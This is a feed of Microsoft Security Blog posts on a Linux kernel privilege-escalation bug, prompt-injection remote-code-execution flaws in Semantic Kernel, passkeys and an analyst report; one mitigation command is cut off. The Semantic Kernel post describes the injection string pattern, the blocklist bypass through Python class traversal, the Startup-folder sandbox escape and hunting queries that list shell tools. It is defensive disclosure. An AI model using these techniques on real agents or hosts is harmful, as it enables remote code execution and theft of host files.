Visualização de leitura

Active attack: Dirty Frag Linux vulnerability expands post-compromise risk

A newly disclosed Linux local privilege escalation vulnerability known as “Dirty Frag” enables escalation from an unprivileged user to root through vulnerable kernel networking and memory-fragment handling components, including esp4, esp6 (CVE-2026-43284), and rxrpc (CVE-2026-43500). Public reporting and proof-of-concept activity indicate the exploit is designed to provide more reliable privilege escalation than traditional race-condition-dependent Linux local privilege escalation techniques.

Dirty Frag may be leveraged after initial compromise through SSH access, web-shell execution, container escape, or compromise of a low-privileged account. Affected environments may include Ubuntu, RHEL, CentOS Stream, AlmaLinux, Fedora, openSUSE, and OpenShift deployments. Microsoft Defender is actively monitoring related activity and investigating additional detections and protections.


This article details an ongoing investigation into active campaign. We will update this report as new details emerge.


Why Dirty Frag matters

Local privilege escalation vulnerabilities are frequently used by threat actors after initial access to expand control over a compromised environment. Once root access is obtained, attackers can disable security tooling, access sensitive credentials, tamper with logs, pivot laterally, and establish persistent access.

Dirty Frag is notable because it introduces multiple kernel attack paths involving rxrpc and esp/xfrm networking components to improve exploitation reliability. Rather than relying on narrow timing windows or unstable corruption conditions often associated with Linux local privilege escalation exploits, Dirty Frag appears designed to increase consistency across vulnerable environments.

This increases operational risk in environments where threat actors already possess limited local execution capability through compromised accounts, vulnerable applications, containers, or exposed administrative interfaces.

Technical overview

Dirty Frag abuses Linux kernel networking and memory-fragment handling behavior involving esp4, esp6, and rxrpc components. Similar to the previously disclosed CopyFail vulnerability (CVE-2026-31431), the exploit attempts to manipulate Linux page cache behavior to achieve privilege escalation. However, Dirty Frag introduces additional attack paths that expand exploitation opportunities and improve reliability.

The vulnerability affects systems where vulnerable modules are present and accessible. In many enterprise environments, these components may already be enabled to support IPsec, VPN functionality, or other networking workloads.

Exploitation scenarios

Threat actors may leverage Dirty Frag after obtaining local code execution through several common intrusion paths, including:

  • Compromised SSH accounts
  • Web-shell access on internet-facing applications
  • Container escapes into the host environment
  • Abuse of low-privileged service accounts
  • Post-exploitation activity following phishing or remote access compromise

Once local access is established, successful exploitation may allow attackers to escalate privileges to root and gain broad control over the affected Linux host.

Limited In-The-Wild Exploitation

Microsoft Defender is currently seeing limited in-the-wild activity where privilege escalation involving ‘su’ is observed, and which may be indicative of techniques associated with either “Dirty Frag” or “Copy Fail”.

The campaign shows a sequential attack timeline where an external connection gains SSH access and spawns an interactive shell, followed by staging and execution of an ELF binary (./update) that immediately triggers a privilege escalation via ‘su’.

After gaining elevated access, the actor modifies a GLPI LDAP authentication file (evidenced by a .swp file from vim), performs reconnaissance of the GLPI directory and system configuration, and inspects an exploit artifact. The activity then shifts to accessing sensitive data and interacting with PHP session files — first deleting multiple session files and then forcefully wiping additional ones — before reading remaining session data, indicating both disruption of active sessions and access to session contents.

Mitigation guidance

The Linux Kernel Organization released patches, which are linked at the National Vulnerability Database (NVD), to fix CVE-2026-43284 on May 8, 2026. Customers who have not applied these patches are urged to do so as soon as possible. As of May 8, 2026, patches for CVE-2026-43500 are not available. CVE-2026-43500 is reportedly reserved for the RxRPC issue but is not yet published in NVD.

While comprehensive remediation guidance continues to evolve, organizations should evaluate interim mitigations immediately.

Recommended actions include:

  • Disable unused rxrpc kernel modules where operationally possible
  • Assess whether esp4, esp6, and related xfrm/IPsec functionality can be temporarily disabled safely
  • Restrict unnecessary local shell access
  • Harden containerized workloads
  • Increase monitoring for abnormal privilege escalation activity
  • Prioritize kernel patch deployment once vendor advisories are released

The following example prevents vulnerable modules from loading and unloads active modules where possible:

cat </dev/null

These mitigations should be carefully evaluated before deployment, particularly in environments relying on IPsec VPNs or RxRPC functionality.

Post-mitigation integrity verification

Mitigation alone may not reverse changes already introduced through successful exploitation attempts.

If exploitation occurred prior to mitigation, malicious modifications may persist in memory or cached file content even after vulnerable modules are disabled. Organizations should validate the integrity of critical files and assess whether cache clearing is appropriate for their environment.

echo 3 | sudo tee /proc/sys/vm/drop_caches

Cache clearing can temporarily increase disk I/O and impact production performance and should be evaluated carefully before deployment.

Microsoft Defender coverage

Microsoft Defender XDR customers can refer to the following list of applicable detections below that provides coverage for behaviors surrounding “Dirty Flag” exploitation.

Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog. 

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence. 

Tactic Observed activity Microsoft Defender coverage 
Execution Exploitation of “Dirty Frag” Microsoft Defender Antivirus  
-  Exploit:Linux/DirtyFrag.A 
– Trojan:Linux/DirtyFrag.Z!MTB 
– Trojan:Linux/DirtyFrag.ZA!MTB 
– Trojan:Linux/DirtyFrag.ZC!MTB 
– Trojan:Linux/DirtyFrag.DA!MTB 
– Exploit:Linux/DirtyFrag.B 

Microsoft Defender for Endpoint 
– Suspicious SUID/SGID process launch 

Microsoft Defender for Cloud 
– Potential exploitation of dirtyfrag vulnerability detected 

Microsoft Defender Vulnerability Management
– Microsoft Defender Vulnerability Management surfaces devices vulnerable to “Dirty Frag” which are linked to the following CVEs:
CVE-2026-43284
CVE-2026-43500

Microsoft Defender Threat Intelligence

Microsoft Defender Threat Intelligence published a threat analytics article and a vulnerability profile for this vulnerability

Microsoft Defender Antivirus

  • Exploit:Linux/DirtyFrag.A
  • Exploit:Linux/DirtyFrag.B
  • Trojan:Linux/DirtyFrag.Z!MTB
  • Trojan:Linux/DirtyFrag.ZA!MTB
  • Trojan:Linux/DirtyFrag.ZC!MTB
  • Trojan:Linux/DirtyFrag.DA!MTB

Microsoft Defender for Cloud

  • Potential exploitation of dirtyfrag vulnerability detected

Microsoft continues investigating additional detections, telemetry correlations, and posture guidance related to Dirty Frag activity.

Further investigation is being conducted by Microsoft Defender towards providing stronger protection and posture recommendations is in progress.

References

Read about CopyFail (CVE-2026-31431), including mitigation and detection guidance here: https://www.microsoft.com/en-us/security/blog/2026/05/01/cve-2026-31431-copy-fail-vulnerability-enables-linux-root-privilege-escalation/

The post Active attack: Dirty Frag Linux vulnerability expands post-compromise risk appeared first on Microsoft Security Blog.

When prompts become shells: RCE vulnerabilities in AI agent frameworks

AI agents have fundamentally changed the threat model of AI model-based applications. By equipping these models with plugins (also called tools), your agents no longer just generate text; they now read files, search connected databases, run scripts, and perform other tasks to actively operate on your network.

Because of this, vulnerabilities in the AI layer are no longer just a content issue and are an execution risk. If an attacker can control the parameters passed into these plugins via prompt injection, the agent may be driven to perform actions beyond its intended use.

The AI model itself isn’t the issue as it’s behaving exactly as designed by parsing language into tool schemas. The vulnerability lies in how the framework and tools trust the parsed data.

To build powerful applications, developers rely heavily on frameworks like Semantic Kernel, LangChain, and CrewAI. These frameworks act as the operating system for AI agents, abstracting away complex model orchestration. But this convenience comes with a hidden cost: because these frameworks act as a ubiquitous foundational layer, a single vulnerability in how they map AI model outputs to system tools carries systemic risk.

As part of our mission to make AI systems more secure and eliminate new class of vulnerabilities, we’re launching a research series focused on identifying vulnerabilities in popular AI agent frameworks. Through responsible disclosure, we work with maintainers to ensure issues are addressed before sharing our findings with the community.

In this post, we share details on the vulnerabilities we discovered in Microsoft’s Semantic Kernel, along with the steps we took to address them and interactive way to try it yourself. Stay tuned for upcoming blogs where we’ll dive into similar vulnerabilities found in frameworks beyond the Microsoft ecosystem.

Background

We discovered a vulnerable path in Microsoft Semantic Kernel that could turn prompt injection into host-level remote code execution (RCE).

A single prompt was enough to launch calc.exe on the device running our AI agent, with no browser exploit, malicious attachment, or memory corruption bug needed. The agent simply did what it was designed to do: interpret natural language, choose a tool, and pass parameters into code.

Figure 1. Illustration of CVE-2026-26030 exploitation using a local model.

This scenario is the real security story behind modern AI agents. Once an AI model is wired to tools, prompt injection draws a thin line between being just a content security problem and becoming a code execution primitive. In this post in our research series on AI agent framework security, we show how two vulnerabilities in Semantic Kernel could allow attackers to cross that line, and what customers should do to assess exposure, patch affected agents, and investigate whether exploitation may already have occurred.

A representative case study: Semantic Kernel

Semantic Kernel is Microsoft’s open-source framework for building AI agents and integrating AI models into applications. With over 27,000 stars on GitHub, it provides essential abstractions for orchestrating AI models, managing plugins, and chaining workflows.

During our security research into the Semantic Kernel framework, we identified and disclosed two critical vulnerabilities: CVE-2026-25592 and CVE-2026-26030. These flaws, which have since been fixed, could allow an attacker to achieve unauthorized code execution by leveraging injection attacks specifically targeted at agents built within the framework.

In the following sections, we break down the mechanics of these vulnerabilities in detail and provide actionable guidance on how to harden your agents against similar exploitation.

CVE-2026-26030: In-Memory Vector Store

Exploitation of this vulnerability requires two conditions:

  1. The attacker must have a prompt injection vector, allowing influence over the agent’s inputs
  2. The targeted agent must have the Search Plugin backed by In-Memory Vector Store functionality using the default configuration

When both these two conditions are met, the vulnerability enables an attacker to achieve RCE from a prompt.

To demonstrate how this vulnerability could be exploited, we built a “hotel finder” agent  using Semantic Kernel. First, we created an In Memory Vector collection to store the hotels’ data, then exposed a search_hotels(city=…) function to the kernel (agent) so that the AI model could invoke it through tool calling.

Figure 2. Semantic Kernel agent configured with In-Memory Vector collection.

When a user inputs, for example, “Find hotels in Paris,” the AI model calls the search plugin with city=”Paris”. The plugin then first runs a deterministic filter function to narrow down the dataset and computes vector similarity (embeddings).

With this understanding of how a Semantic Kernel agent performs the search, let’s dive deep into the vulnerability.

Issue 1: Unsafe string interpolation

The default filter function that we mentioned previously is implemented as a Python lambda expression executed using eval(). In our example, The default filter will result to new_filter = “lambda x: x.city == ‘Paris'”.

Figure 3. Default filtering function definition.

The vulnerability is that kwargs[param.name] is AI model-controlled and not sanitized. This acts as a classic injection sink. By closing the quote () and appending Python logic, an attacker could turn a simple data lookup into an executable payload:

  • Input: ‘ or MALICIOUS_CODE or ‘
  • Result: lambda x: x.city == ” or MALICIOUS_CODE or ”

Issue 2: Avoidable blocklist

The framework developers anticipated this RCE risk and implemented a validator that parses the filter string into an Abstract Syntax Tree (AST) before execution.

Figure 4. Blocklist implementation.

Before running a user-provided filter code, the application runs a validation function designed to block unsafe operations. At a high level, the validation does the following:

  1. It only allows lambda expressions. It rejects outright any attempt to pass full code blocks (such as import statements or class definitions).
  2. It scans every element in the code for dangerous identifiers and attributes that could enable arbitrary code execution (for example, strings like eval, exec, open, __import__, and similar ones). If any of these identifiers appear, the code is rejected.
  3. If the code passes both checks, it is executed in a restricted environment where Python’s built-in functions (like open and print) are deliberately removed. So even if something slips through, it shouldn’t have access to dangerous capabilities.

The resulting lambda is then used to filter records in the Vector Store.

While this approach is solid in theory, blocklists in dynamic languages like Python are inherently fragile because the language’s flexibility allows restricted operations to be reintroduced through alternate syntax, libraries, or runtime evaluation.

We found a way to bypass this blocklist implementation through a specially crafted exploit prompt.

Exploit

Our exploit prompt was designed to manipulate the agent into triggering a Search Plugin invocation with an input that ultimately leads to malicious code execution:

A Malicious prompt demanding execution of the search_hotels function with the malicious argument.

This prompt circumvented the agent to trigger the following function calling:

Invocation of the “search hotels” function with the malicious argument.

As result, the lambda function was formatted as the following and executed inside eval(). This payload escaped the template string, traversed Python’s class hierarchy to locate BuiltinImporter, and used it to dynamically load os and call system(). These steps bypassed the import blocklists to launch an arbitrary shell command (for example, calc.exe) while keeping the template syntax valid with a clean closing expression.

The filter function didn’t block the payload because of the following reasons:

1. Missing dangerous names

The payload used several attributes that weren’t in the blocklist:

  • __name__  – Used to find BuiltinImporter by name
  • load_module – The method that imports modules
  • system – The method that executes shell commands
  • BuiltinImporter – The class itself

2. Structural check passes

The payload was wrapped inside a valid lambda expression. The check isinstance(tree.body, ast.Lambda) passed because the entire thing is in itself a lambda that just happens to contain malicious code in its body.

3. Empty __builtins__ is irrelevant
The eval() call used {“__builtins__”: {}} to remove access to built-in functions. However, this protection was meaningless because the payload never used built-ins directly. Instead, it started with tuple(), which exists regardless of the builtins environment, and crawled through Python’s type system to reach dangerous functionality.

4. No ast.Subscript checking
While not used in this payload, it’s worth noting that the filter only checked ast.Name and ast.Attribute nodes. If the payload needed to use a blocked name, it could’ve accessed it using bracket notation (for example, obj[‘__class__’] instead of obj.__class__), which creates an ast.Subscript node that the validation completely ignored.

Mitigation

After responsibly disclosing the vulnerability to MSRC, the Microsoft Semantic Kernel team implemented a comprehensive fix using four layers of protection to eliminate every escape primitive needed to turn a lambda filter into executable code:

  • AST node-type allowlist – Permits only safe constructs like comparisons, boolean logic, arithmetic, and literals.
  • Function call allowlist – Checks even allowed AST call nodes to ensure only safe functions can be invoked.
  • Dangerous attributes blocklist – Blocks class hierarchy traversal (for examples, __class__, __subclasses__).
  • Name node restriction – Allows only the lambda parameter (for example, x) as a bare identifier and rejects references to osevaltype, and others.
How do I know if I am affected?

Your agent is vulnerable to CVE-2026-26030 if it meets all of the following conditions:

  • It uses the Python package semantic-kernel.
  • It’s running a framework version prior to 1.39.4.
  • It uses the In-Memory Vector Store and relies on its filter functionality (when acting as the backend for the Search Plugin using default configurations).
What to do if I am affected?

You don’t need to rewrite your agent. Upgrading the Python semantic-kernel dependency to version 1.39.4 or higher mitigates the risk.

What about the time that my agent was vulnerable?

While patching closes the bug, but it doesn’t answer the retrospective question defenders care about: whether their agent was exploited before they upgraded.

First, define the vulnerable window for each affected deployment: from the moment a vulnerable Semantic Kernel Python version was deployed until the moment version 1.39.4 or later was installed. Any investigation should focus on that time range.

Second, hunt for host-level post-exploitation signals during that vulnerable window. Because successful exploitation results in code execution on the host, the most useful evidence is in endpoint telemetry: suspicious child processes, outbound connections, or persistence artifacts created by the agent host process. We provide a set of practical advanced hunting queries for further investigation in a separate section of this blog.

If you find suspicious activity during that window, treat it as a potential host compromise. Review the affected host, rotate credentials and tokens accessible to the agent, and investigate what data or systems that host could reach.

CVE-2026-25592: Arbitrary file write through SessionsPythonPlugin

Before diving into the mechanics of this second vulnerability, here is what an agent sandbox escape looks like in practice: with a single prompt, an attacker could bypass a cloud-hosted sandbox, write a malicious payload directly to the host device’s Windows Startup folder, and achieve full RCE.

The container boundary

Semantic Kernel includes a built-in plugin called SessionsPythonPlugin that allows agents to safely execute Python code inside Azure Container Apps dynamic sessions, which are isolated cloud hosted sandboxes with their own filesystem.

The security model relies entirely on this boundary. Code runs in the isolated sandbox and cannot touch the host device where the agent process runs. To help move data in and out of the sandbox, the plugin uses helper functions like UploadFile and DownloadFile, which run on the host side to transfer files across this boundary.

The vulnerability

In the .NET software development kit (SDK), DownloadFileAsync was accidentally marked with a [KernelFunction] attribute, which officially advertised it to the AI model as a callable tool, complete with its parameter schema:

Because of this attribute, the localFilePath parameter, which dictates exactly where File.WriteAllBytes() saves data on the host device, was now entirely AI controlled. With no path validation, directory restriction, or sanitization in place, an attacker wouldn’t need a complex hypervisor exploit; they just needed to prompt the model to do it for them.

(Note: Arbitrary File Read. A similar vulnerability existed in reverse for the upload_file() function across both the Python and .NET SDKs. It accepted any local file path without validation, allowing prompt injections to exfiltrate sensitive host files, like SSH keys or credentials, directly into the sandbox).

Attack chain overview

By chaining two exposed tools, an attacker could turn standard function calling into a sandbox escape:

Step 1: Create the payload

An  injected prompt instructs the agent to use the ExecuteCode tool to generate a malicious script inside the isolated container:

At this point, the payload is contained. It exists only in the sandbox and cannot execute on the host.

Step 2: Escape the sandbox

A second injected instruction tells the AI model to use the DownloadFileAsync tool to download the file to a dangerous location on the host:

The agent calls:

The agent fetches the script from the sandbox’s API and writes it directly to the host’s Windows\Start Menu\Programs\Startup folder.

Step 3: Execute the code

On the next user sign-in, the script runs, granting full host compromise.

This exploit illustrates the MITRE ATLAS technique AML.T0051 (LLM Prompt Injection) cascading into AML.T0016 (Obtain Capabilities).

Exposing DownloadFileAsync provided a direct file write primitive on the host filesystem, effectively negating the container isolation.

The fix and how to defend

Semantic Kernel patched this vulnerability by removing the root cause of tool exposure and adding defense in depth:

Removed AI access – The [KernelFunction] attribute was removed, making the function invisible to the AI model. The AI agent can no longer invoke it, and prompt injection can no longer reach it:

This single change breaks the entire attack chain. The AI can now only be called directly by the developer’s intentional code.

  • Path validation – For developers calling the function programmatically, a ValidateLocalPathForDownload() method was added using path canonicalization (Path.GetFullPath()) and directory allowlist matching to ensure the target path falls within permitted directories:
Similar opt-in protections were applied to uploads.
How do I know if I am affected?

Your agent is vulnerable to CVE-2026-25592 if it uses a Semantic Kernel .NET SDK version older than 1.71.0.

Defending the agentic edge

If you use Semantic Kernel, our primary recommendation is to upgrade immediately. You don’t need to rewrite your agent’s architecture; the security updates simply remove the AI model’s ability to trigger these functions autonomously.

More broadly, defending AI agents requires acknowledging that AI models aren’t security boundaries. Security teams must correlate signals across two layers: the AI model level (intent detection through meta prompts and content safety filters) and the host level (execution detection). If an attacker bypasses the AI model guardrails, traditional endpoint defense must be in place to detect anomalous behavior, such as an AI agent process suddenly spawning command lines or dropping scripts into Startup folders.

Not bugs, but developed by design

Untrusted data being used as input for high-risk operations isn’t entirely new. In the early days of web application security, such input was passed directly into SQL queries or filesystem APIs. Today, agents are doing something similar, in that they could map untrusted natural-language input to system tools.

The overarching lesson from both vulnerabilities is that both aren’t bugs in the AI model itself, but rather issues in agent architecture and tool design. We must make a clear distinction between model behavior and agent architecture. The AI model functions exactly as it was designed to: translate intent into structured tool calls.

When models are connected to system tools, prompt injection risks may extend beyond typical chatbot misuse and require additional safeguards. Instead, it becomes a direct path to concrete execution primitives like data exfiltration, arbitrary file writes, and RCE. For a deeper look at the runtime risks of tool-connected AI models, see Running OpenClaw safely: identity, isolation, and runtime risk.

As mentioned previously, your LLM is not a security boundary. The tools you expose define your attacker’s affected scope. Any tool parameter the model can influence must be treated as attacker-controlled input.

In the next blog in this series, we’ll expand beyond Semantic Kernel to explore structurally similar execution vulnerabilities that we found in other widely used third-party agent frameworks.


CTF challenge: Attack your own agent

If you want to see how prompt injections escalate into execution and to put your skills to the test, we’ve packaged the vulnerable hotel-finder agent that we described in this blog into an interactive, hands-on capture-the-flag (CTF) challenge.

This CTF challenge lets you step into the shoes of an attacker and try to exploit the CVE-2026-26030 vulnerability in a controlled environment. You need to craft a prompt injection that not only bypasses the agent’s natural language defenses but also smuggle a Python AST-traversal payload through the vulnerable eval() sink.

To see if you can manipulate the AI model into launching arbitrary code and popping calc.exe on the server, download the challenge, spin it up in a sandbox, and see if you can achieve RCE. Keep in mind that this challenge is for educational purposes only, and shouldn’t be run in production environments.

Reconnaissance:

Exploit (jailbreak and payload):

Note: Because the agent will running locally on your device, calc.exe will open on your desktop. In a real-world scenario, such an executable file will launch remotely on the server hosting the agent.

Download the CTF challenge: https://github.com/amiteliahu/AIAgentCTF/tree/main/CVE-2026-26030

Advanced hunting

The following advanced hunting queries lets you surface suspicious activities from Semantic Kernel agents.

Detect common RCE post-exploitation child processes from Semantic Kernel agent hosts

DeviceProcessEvents
| where Timestamp > ago(30d)
| where InitiatingProcessCommandLine matches regex @"(?i)semantic[\s_\-]?kernel"
    or InitiatingProcessFolderPath matches regex @"(?i)semantic[\s_\-]?kernel"
| where FileName in~ (
    "cmd.exe", "powershell.exe", "pwsh.exe", "bash.exe", "wsl.exe",
    "certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
    "wscript.exe", "cscript.exe", "bitsadmin.exe", "curl.exe",
    "wget.exe", "whoami.exe", "net.exe", "net1.exe", "nltest.exe",
    "klist.exe", "dsquery.exe", "nslookup.exe"
)
| project 
    Timestamp,
    DeviceName,
    AccountName,
    FileName,
    ProcessCommandLine,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine,
    InitiatingProcessFolderPath
| sort by Timestamp desc

Detect .NET hosting Semantic Kernel that spawns suspicious children

DeviceProcessEvents
| where Timestamp > ago(30d)
| where InitiatingProcessFileName in~ ("dotnet.exe")
| where InitiatingProcessCommandLine matches regex @"(?i)(semantic[\s_\-]?kernel|SKAgent|kernel\.run)"
| where FileName in~ (
    "cmd.exe", "powershell.exe", "pwsh.exe", "bash.exe",
    "certutil.exe", "curl.exe", "whoami.exe", "net.exe"
)
| project 
    Timestamp,
    DeviceName,
    AccountName,
    FileName,
    ProcessCommandLine,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine
| sort by Timestamp desc

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedInX (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

The post When prompts become shells: RCE vulnerabilities in AI agent frameworks appeared first on Microsoft Security Blog.

World Passkey Day: Advancing passwordless authentication

World Passkey Day is a chance to reflect on progress toward a shared goal: reducing our reliance on passwords and other phishable authentication methods by accelerating passkey adoption. As cyberattacks become more automated and AI-powered, each account is only as secure as its weakest credential. Real progress requires more than adding stronger sign-in options—it requires removing phishable credentials and strengthening common attack paths like recovery flows. In partnership with the FIDO Alliance, Microsoft is committed to advancing passkey adoption through ongoing standards work, active participation in working groups, and other contributions to a passwordless future.

Passwords remain a major source of risk; they’re difficult to manage and easy to steal. Along with weaker forms of multifactor authentication, they’re also highly vulnerable to phishing: AI-powered campaigns drive click-through rates as high as 54%.1 In response, Microsoft is expanding passkey adoption across our ecosystem. We’re reducing reliance on legacy authentication and strengthening account recovery so it won’t become a backdoor for cyberattackers.

“Instead of vulnerable secrets or potentially identifiable personal information, a passkey uses a private key stored safely on the user’s device. It only works on the website or app for which the user created it, and only if that same user unlocks it with their biometrics or PIN. This means passkey users can’t be tricked into signing in to a malicious lookalike website, and a passkey is unusable unless the user is present and consenting. These are some qualities that make passkeys a ‘phishing-resistant’ form of authentication.”

From Microsoft Digital Defense Report.

Passkey adoption continues to grow industry wide

Passkey adoption is accelerating: FIDO Alliance estimates 5 billion passkeys already in use worldwide.2 Across Microsoft’s consumer services, including OneDrive, Xbox, and Copilot, hundreds of millions of users sign in with passkeys every day.

There are many reasons to choose passkeys as the standard authentication method over passwords. Sign-in success rates are significantly higher than with passwords, and exposure to credential-based attacks is significantly lower.3 Organizations and individual users alike prefer the simpler, more secure sign-in experience passkeys offer.4

Inside Microsoft, we’ve eliminated weaker authentication methods and rolled out phishing-resistant authentication, covering 99.6% of users and devices in our environment.5 It’s made signing in a lot simpler: no codes to enter, no extra prompts to manage, just a straightforward experience for everyone.

Product updates across sign-in and recovery

Across Microsoft, we’ve been steadily building passkey support into every layer of the identity experience from consumer accounts to enterprise access with Microsoft Entra, and from device-based authentication like Windows Hello to Microsoft’s password manager. This work ensures people can create and use passkeys wherever they sign in, with a consistent, phishing-resistant experience across devices, apps, and environments.

To make passkeys more accessible, we’re expanding where and how people can use them:

  • Synced passkeys and passkey profiles in Microsoft Entra ID make it easier to scale passwordless sign-in across diverse environments. We’re expanding flexibility in cloud passkey management, including support for larger and more complex policies, and transitioning tenants to a unified passkey profile model.
  • Entra passkeys on Windows make it simple for users to create and use device-bound passkeys directly on personal or unmanaged Windows devices using Windows Hello, and will be generally available in late May 2026.
  • Passkeys for Microsoft Entra External ID will be generally available late May 2026, so your customer-facing applications can offer a more seamless, consumer-grade sign-in experience.
  • Passkey-preferred authentication in Microsoft Entra ID (preview) detects registered methods and prompts the strongest one first. If a passkey is registered, that’s what the user sees—immediately. 
  • On the consumer side, with Microsoft Password Manager, users can now save and sync passkeys across devices signed in with their Microsoft account, with support for iOS and Android rolling out soon through Microsoft Edge. 

Account recovery also plays a critical role in maintaining the integrity of identity systems. Historically, it’s been vulnerable to cyberattackers who try to hijack the recovery process, for example by impersonating legitimate users and requesting new credentials.

Microsoft Entra ID account recovery, generally available today, strengthens security for recovery flows by enabling users to regain access to their accounts through a robust identity verification process. Users can regain access after losing all authentication methods by using government-issued ID and biometric face checks. At general availability, we are expanding our identity verification ecosystem with two new partners—1Kosmos and CLEAR1—joining our existing partners Au10tix, IDEMIA, and TrueCredential. 

Removing phishable credentials from user accounts

Strengthening authentication is important, but reducing risk means eliminating phishable credentials entirely. Microsoft is continuing to phase out legacy methods and move users toward phishing-resistant authentication. Starting in January 2027, security questions will be removed as a password reset option in Microsoft Entra ID due to their susceptibility to guessing and social engineering.

The rationale is straightforward: improving strong methods while removing weak ones shrinks the attack surface. This is increasingly urgent as AI agents act on behalf of users. If an identity is compromised, cyberattackers can leverage those agents to access systems, execute workflows, and operate within existing permissions. Organizations need to address this risk quickly.

A more secure and usable future

Last year, Microsoft joined dozens of organizations in taking the Passkey Pledge, a commitment to accelerating the adoption of phishing-resistant authentication and to moving beyond passwords. Since then, we’ve seen meaningful progress, from hundreds of millions of better-protected consumer accounts to large-scale deployments across organizations like our own.

What once felt like a long-term shift is finally gaining real momentum: authentication is becoming simpler, safer, and passwordless.

For a more in-depth perspective on how cyberattackers try to bypass authentication through fallback methods and recovery flows—and how to address those gaps—read our companion post.

Getting started

Organizations that want to strengthen their identity security posture can enable passkeys for their users and extend policy protections across both sign-in and recovery scenarios.

Get started with a phishing-resistant passwordless authentication deployment in Microsoft Entra ID.

Individuals can create and use passkeys for their personal accounts for better security and convenience.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.


1Microsoft Digital Defense Report 2025.

2FIDO Alliance reports mainstream global usage on World Passkey Day. FIDO Alliance, 2026.

3Synced passkeys and high assurance account recovery, Microsoft Entra blog. December 16, 2025.

4FIDO Alliance Champions Widespread Passkey Adoption and a Passwordless Future on World Passkey Day 2025, FIDO News Center. May 1, 2025.

5Microsoft Security and Future Initiative (SFI) Progress Report—November 2025.

The post World Passkey Day: Advancing passwordless authentication appeared first on Microsoft Security Blog.

​​Microsoft named an overall leader in KuppingerCole Analyst’s 2026 Emerging AI Security Operations Center (SOC) report ​​

Security operations are entering a new phase. As attack techniques grow faster and more complex, the effectiveness of a SOC depends less on collecting more data and more on how well platforms can turn context into action at scale.

KuppingerCole Analysts’ 2026 Emerging AI Security Operations Center (SOC) reflects this shift clearly: the future of security automation is not defined by static rules or isolated workflows, but by intelligence‑driven automation that supports analyst decision‑making across the full security lifecycle. This evolution mirrors what many security leaders already experience day to day, that the limiting factor is no longer alert volume, but human capacity.

Microsoft is excited to be named an Overall Leader, and the Market Leader, in this report, as we see automation as a core component of the future of cybersecurity.


A quadrant chart titled “Leadership Compass: AI SOC” compares vendors by product (horizontal) and innovation (vertical). The top-right “Overall Leader” quadrant highlights Microsoft, Google, Torq, CrowdStrike, Palo Alto Networks, ServiceNow, Swimlane, and Tines as leading providers, with others positioned lower across the chart.
Figure 1: Overall Leadership in the AI SOC market

From playbook‑driven SOAR to intelligence‑led automation

Traditional security orchestration, automation, and response (SOAR) solutions were built to automate predictable, repeatable tasks: enrichment steps, ticket creation, notifications, and predefined containment actions. These capabilities remain valuable, but they were designed for an era when incidents followed more deterministic patterns.

This is a critical change. In many SOCs today, analysts still spend significant time:

  • Stitching together context across alerts and data sources.
  • Manually triaging incidents that turn out to be benign.
  • Following repetitive investigation and response steps.

The result is slower response times and analyst burnout—at exactly the moment attackers are moving faster and operating more quietly.

Automation built into the analyst experience

Microsoft has evolved the way these common challenges can be addressed, leveraging machine learning, large language models (LLMs), and agents, including releases such as:

  • Automatic attack disruption: An always-on capability that limits lateral attackers and reduces the overall impact of an attack, from associated costs to loss of productivity, leaving security operations teams in complete control of investigating, remediating, and bringing assets back online.
  • Phishing triage agent: An agent that runs sophisticated assessments—including semantic evaluation of email content, URL and file inspection, and intent detection—to determine whether a submission is a true phishing threat or a false alarm.
  • AI powered incident prioritization: A machine learning prioritization model to surface the incidents that matter most, assigning each incident a priority score from 0–100 and explaining the key factors behind the ranking. 
  • Playbook generator: An experience that allows users to create python-code playbooks using natural language for flexible workflow automation.

These capabilities are just the beginning of how we are introducing agents and automation to help users move faster, freeing analysts to focus on higher‑value tasks like proactive hunting and threat analysis.

The next evolution: The agentic SOC

The KuppingerCole report reinforces a broader industry trend, that security platforms must do more than automate pre‑defined workflows. They must support adaptive, intelligence‑driven operations that can respond to novel and fast‑moving threats.

This is where Microsoft is making its next set of investments: agentic security operations.

With innovations such as the Microsoft Sentinel MCP (Model Context Protocol) Server, shared security data and graph context, and deep integration with Microsoft Security Copilot, Sentinel is evolving into a platform where AI agents can:

  • Reason across identity, endpoint, cloud, and network signals.
  • Summarize incidents and investigations in natural language.
  • Assist with decision‑making by correlating weak signals over time.
  • Take action—with human oversight—when confidence thresholds are met.

These agents are designed to work alongside analysts, augmenting expertise and dramatically accelerating time to response.

Why this matters for security teams

The direction highlighted by KuppingerCole, and reflected in Microsoft’s roadmap, isn’t about chasing AI for its own sake. It’s about addressing real SOC pain points:

  • Scale: Human‑only operations don’t scale with modern attack surfaces.
  • Consistency: Automated and agent‑assisted workflows reduce variance and errors.
  • Speed: Faster reasoning and response directly reduce attacker dwell time.

By combining automation, rich context, and intelligent agents, Microsoft Sentinel helps SOC teams move from reactive alert handling to proactive, intelligence‑led defense without forcing teams to re‑architect their operations overnight.

Looking ahead

Security automation is no longer a bolt‑on capability. As KuppingerCole’s research makes clear, it is becoming a foundational element of modern security operations. The evolution of SOAR reflects the reality of a shift from static playbooks to adaptive, context‑aware assistance that scales human expertise.

Microsoft is investing accordingly, advancing an AI‑first approach to security analytics that helps SOC teams operate with greater speed, confidence, and resilience as threats continue to evolve. Read the Emerging AI Security Operations Center (SOC) report to learn more.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post ​​Microsoft named an overall leader in KuppingerCole Analyst’s 2026 Emerging AI Security Operations Center (SOC) report ​​ appeared first on Microsoft Security Blog.

ClickFix campaign uses fake macOS utilities lures to deliver infostealers

